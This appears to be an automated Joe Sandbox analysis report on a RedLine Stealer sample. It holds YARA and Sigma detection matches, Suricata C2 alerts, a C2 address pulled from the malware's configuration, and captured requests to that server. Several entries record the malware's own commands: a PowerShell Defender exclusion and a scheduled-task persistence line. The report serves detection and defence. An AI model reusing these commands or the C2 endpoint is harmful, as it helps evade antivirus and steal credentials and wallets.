10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x295eb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2961f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29648:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2b887:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2ae03:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b14b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2aa81:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x2826f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x20358:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x20d38:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet
10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x4300a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x41e68:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x42c8e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0x40aaa:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField 0x403de:$a9: <ScanFTP>k__BackingField
0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x297eb:$gen01: ChromeGetRoamingName 0x4140b:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2981f:$gen02: ChromeGetLocalName 0x4143f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29848:$gen03: get_UserDomainName 0x41468:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2ba87:$gen04: get_encrypted_key 0x436a7:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2b003:$gen05: browserPaths 0x42c23:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b34b:$gen06: GetBrowsers 0x42f6b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2ac81:$gen07: get_InstalledInputLanguages 0x428a1:$gen07: get_InstalledInputLanguages
0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0xcc20a:$a4: get_ScannedWallets 0xe402a:$a4: get_ScannedWallets 0xfbc4a:$a4: get_ScannedWallets 0xcb068:$a5: get_ScanTelegram 0xe2e88:$a5: get_ScanTelegram 0xfaaa8:$a5: get_ScanTelegram 0xcbe8e:$a6: get_ScanGeckoBrowsersPaths 0xe3cae:$a6: get_ScanGeckoBrowsersPaths 0xfb8ce:$a6: get_ScanGeckoBrowsersPaths 0xc9caa:$a7: <Processes>k__BackingField 0xe1aca:$a7: <Processes>k__BackingField 0xf96ea:$a7: <Processes>k__BackingField 0xc7bbc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xdf9dc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xf75fc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xc95de:$a9: <ScanFTP>k__BackingField 0xe13fe:$a9: <ScanFTP>k__BackingField 0xf901e:$a9: <ScanFTP>k__BackingField
0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xca60b:$gen01: ChromeGetRoamingName 0xe242b:$gen01: ChromeGetRoamingName 0xfa04b:$gen01: ChromeGetRoamingName 0xca63f:$gen02: ChromeGetLocalName 0xe245f:$gen02: ChromeGetLocalName 0xfa07f:$gen02: ChromeGetLocalName 0xca668:$gen03: get_UserDomainName 0xe2488:$gen03: get_UserDomainName 0xfa0a8:$gen03: get_UserDomainName 0xcc8a7:$gen04: get_encrypted_key 0xe46c7:$gen04: get_encrypted_key 0xfc2e7:$gen04: get_encrypted_key 0xcbe23:$gen05: browserPaths 0xe3c43:$gen05: browserPaths 0xfb863:$gen05: browserPaths 0xcc16b:$gen06: GetBrowsers 0xe3f8b:$gen06: GetBrowsers 0xfbbab:$gen06: GetBrowsers 0xcbaa1:$gen07: get_InstalledInputLanguages 0xe38c1:$gen07: get_InstalledInputLanguages 0xfb4e1:$gen07: get_InstalledInputLanguages
0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xc90ca:$u7: RunPE 0xe0eea:$u7: RunPE 0xf8b0a:$u7: RunPE 0xcc781:$u8: DownloadAndEx 0xe45a1:$u8: DownloadAndEx 0xfc1c1:$u8: DownloadAndEx 0xc1d70:$pat14: , CommandLine: 0xd9b90:$pat14: , CommandLine: 0xf17b0:$pat14: , CommandLine: 0xcbcb9:$v2_1: ListOfProcesses 0xe3ad9:$v2_1: ListOfProcesses 0xfb6f9:$v2_1: ListOfProcesses 0xc92cb:$v2_2: get_ScanVPN 0xc936e:$v2_2: get_ScanFTP 0xca05e:$v2_2: get_ScanDiscord 0xcb04c:$v2_2: get_ScanSteam 0xcb068:$v2_2: get_ScanTelegram 0xcb10e:$v2_2: get_ScanScreen 0xcbe56:$v2_2: get_ScanChromeBrowsersPaths 0xcbe8e:$v2_2: get_ScanGeckoBrowsersPaths 0xcc149:$v2_2: get_ScanBrowsers
0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x6fbea:$a4: get_ScannedWallets 0x87a0a:$a4: get_ScannedWallets 0x9f62a:$a4: get_ScannedWallets 0x6ea48:$a5: get_ScanTelegram 0x86868:$a5: get_ScanTelegram 0x9e488:$a5: get_ScanTelegram 0x6f86e:$a6: get_ScanGeckoBrowsersPaths 0x8768e:$a6: get_ScanGeckoBrowsersPaths 0x9f2ae:$a6: get_ScanGeckoBrowsersPaths 0x6d68a:$a7: <Processes>k__BackingField 0x854aa:$a7: <Processes>k__BackingField 0x9d0ca:$a7: <Processes>k__BackingField 0x6b59c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x833bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x9afdc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x6cfbe:$a9: <ScanFTP>k__BackingField 0x84dde:$a9: <ScanFTP>k__BackingField 0x9c9fe:$a9: <ScanFTP>k__BackingField
0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x6dfeb:$gen01: ChromeGetRoamingName 0x85e0b:$gen01: ChromeGetRoamingName 0x9da2b:$gen01: ChromeGetRoamingName 0x6e01f:$gen02: ChromeGetLocalName 0x85e3f:$gen02: ChromeGetLocalName 0x9da5f:$gen02: ChromeGetLocalName 0x6e048:$gen03: get_UserDomainName 0x85e68:$gen03: get_UserDomainName 0x9da88:$gen03: get_UserDomainName 0x70287:$gen04: get_encrypted_key 0x880a7:$gen04: get_encrypted_key 0x9fcc7:$gen04: get_encrypted_key 0x6f803:$gen05: browserPaths 0x87623:$gen05: browserPaths 0x9f243:$gen05: browserPaths 0x6fb4b:$gen06: GetBrowsers 0x8796b:$gen06: GetBrowsers 0x9f58b:$gen06: GetBrowsers 0x6f481:$gen07: get_InstalledInputLanguages 0x872a1:$gen07: get_InstalledInputLanguages 0x9eec1:$gen07: get_InstalledInputLanguages
0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x6caaa:$u7: RunPE 0x848ca:$u7: RunPE 0x9c4ea:$u7: RunPE 0x70161:$u8: DownloadAndEx 0x87f81:$u8: DownloadAndEx 0x9fba1:$u8: DownloadAndEx 0x65750:$pat14: , CommandLine: 0x7d570:$pat14: , CommandLine: 0x95190:$pat14: , CommandLine: 0x6f699:$v2_1: ListOfProcesses 0x874b9:$v2_1: ListOfProcesses 0x9f0d9:$v2_1: ListOfProcesses 0x6ccab:$v2_2: get_ScanVPN 0x6cd4e:$v2_2: get_ScanFTP 0x6da3e:$v2_2: get_ScanDiscord 0x6ea2c:$v2_2: get_ScanSteam 0x6ea48:$v2_2: get_ScanTelegram 0x6eaee:$v2_2: get_ScanScreen 0x6f836:$v2_2: get_ScanChromeBrowsersPaths 0x6f86e:$v2_2: get_ScanGeckoBrowsersPaths 0x6fb29:$v2_2: get_ScanBrowsers
Click to see the 40 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", ProcessId: 6660, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe, ParentImage: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe, ParentProcessId: 7408, ParentProcessName: wZWwzQVEakJvEU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp", ProcessId: 7680, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", ProcessId: 4296, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe", ProcessId: 6660, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nzLoHpgAln.exe", ParentImage: C:\Users\user\Desktop\nzLoHpgAln.exe, ParentProcessId: 6176, ParentProcessName: nzLoHpgAln.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp", ProcessId: 4296, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:10.718870+0100	2045000	1	Malware Command and Control Activity Detected	185.222.57.76	55615	192.168.2.4	49736	TCP
2025-01-01T12:32:20.107021+0100	2045000	1	Malware Command and Control Activity Detected	185.222.57.76	55615	192.168.2.4	49739	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:13.487839+0100	2046056	1	A Network Trojan was detected	185.222.57.76	55615	192.168.2.4	49736	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:13.487839+0100	2045001	1	Malware Command and Control Activity Detected	185.222.57.76	55615	192.168.2.4	49736	TCP
2025-01-01T12:32:23.023775+0100	2045001	1	Malware Command and Control Activity Detected	185.222.57.76	55615	192.168.2.4	49739	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:05.708973+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49736	185.222.57.76	55615	TCP
2025-01-01T12:32:14.896477+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49739	185.222.57.76	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:10.927753+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49736	185.222.57.76	55615	TCP
2025-01-01T12:32:20.318381+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49739	185.222.57.76	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:15.419091+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49741	185.222.57.76	55615	TCP
2025-01-01T12:32:24.903101+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49749	185.222.57.76	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:13.891111+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49738	185.222.57.76	55615	TCP
2025-01-01T12:32:23.435176+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49748	185.222.57.76	55615	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T12:32:05.708973+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49736	185.222.57.76	55615	TCP
2025-01-01T12:32:14.896477+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49739	185.222.57.76	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.57.76:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: nzLoHpgAln.exe	ReversingLabs: Detection: 63%
Source: nzLoHpgAln.exe	Virustotal: Detection: 56%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: nzLoHpgAln.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Unpacked PE file: 0.2.nzLoHpgAln.exe.40000.0.unpack

Source: nzLoHpgAln.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: nzLoHpgAln.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_048FD088
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_048FAF2C
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 4x nop then jmp 09F4ABF9h	0_2_09F4AE83
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 4x nop then jmp 0A049F11h	10_2_0A04A19B

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49736 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49736 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49739 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49739 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49738 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49741 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.76:55615 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49736 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.76:55615 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.57.76:55615 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49748 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.57.76:55615 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49739 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49749 -> 185.222.57.76:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.57.76:55615 -> 192.168.2.4:49739

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.57.76:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49749

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 185.222.57.76:55615

Source: global traffic

TCP traffic: 192.168.2.4:61325 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.76:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.76:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.76:55615Content-Length: 953964Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.76:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.76:55615Content-Length: 953956Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.76:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.76:55615Content-Length: 953783Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.76:55615Content-Length: 953775Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

